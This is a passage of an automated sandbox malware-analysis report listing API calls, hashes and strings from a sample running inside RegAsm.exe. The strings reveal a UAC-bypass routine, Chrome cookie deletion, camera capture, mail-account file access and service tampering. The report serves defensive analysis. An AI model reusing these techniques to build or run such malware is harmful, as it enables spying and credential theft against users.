                                                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                  • CoUninitialize.OLE32 ref: 00407664
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                  • API String ID: 3851391207-1839356972
                                                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                  APIs
                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                                                  Strings
                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                  • UserProfile, xrefs: 0040BAE8
                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteErrorFileLast
                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                  • API String ID: 2018770650-304995407
                                                                                  • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                  • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                  APIs
                                                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                  • __allrem.LIBCMT ref: 0043AD51
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                  • String ID:
                                                                                  • API String ID: 1992179935-0
                                                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1414292761-0
                                                                                  • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                  • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prologSleep
                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                  • API String ID: 3469354165-3054508432
                                                                                  • Opcode ID: 87d348dc2dc1b6c986fd9612f50c3895d21e5814a6553e43068548d39ede05e3
                                                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                  • Opcode Fuzzy Hash: 87d348dc2dc1b6c986fd9612f50c3895d21e5814a6553e43068548d39ede05e3
                                                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __cftoe
                                                                                  • String ID:
                                                                                  • API String ID: 4189289331-0
                                                                                  • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                  • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 10001607
                                                                                  • _strcat.LIBCMT ref: 1000161D
                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                  • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                  • String ID:
                                                                                  • API String ID: 1922816806-0
                                                                                  • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                  • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                  • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                  • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                  APIs
                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 3594823470-0
                                                                                  • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                  • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                  • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                  • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                  • String ID:
                                                                                  • API String ID: 493672254-0
                                                                                  • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                  • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                  • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                  • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                  • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                  • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                  • _free.LIBCMT ref: 10005B2D
                                                                                  • _free.LIBCMT ref: 10005B55
                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                  • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                  • _abort.LIBCMT ref: 10005B74
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 3160817290-0
                                                                                  • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                  • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                  • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                  • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • _free.LIBCMT ref: 004482CC
                                                                                  • _free.LIBCMT ref: 004482F4
                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                  • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • _abort.LIBCMT ref: 00448313
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 3160817290-0
                                                                                  • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                  • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                  • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                  • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                  APIs
                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                  • String ID:
                                                                                  • API String ID: 221034970-0
                                                                                  • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                  • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                  APIs
                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                    • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                    • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                    • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                  • API String ID: 4036392271-1520055953
                                                                                  • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                  • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                  • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                  • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                  APIs
                                                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                  • String ID: 0$MsgWindowClass
                                                                                  • API String ID: 2877667751-2410386613
                                                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
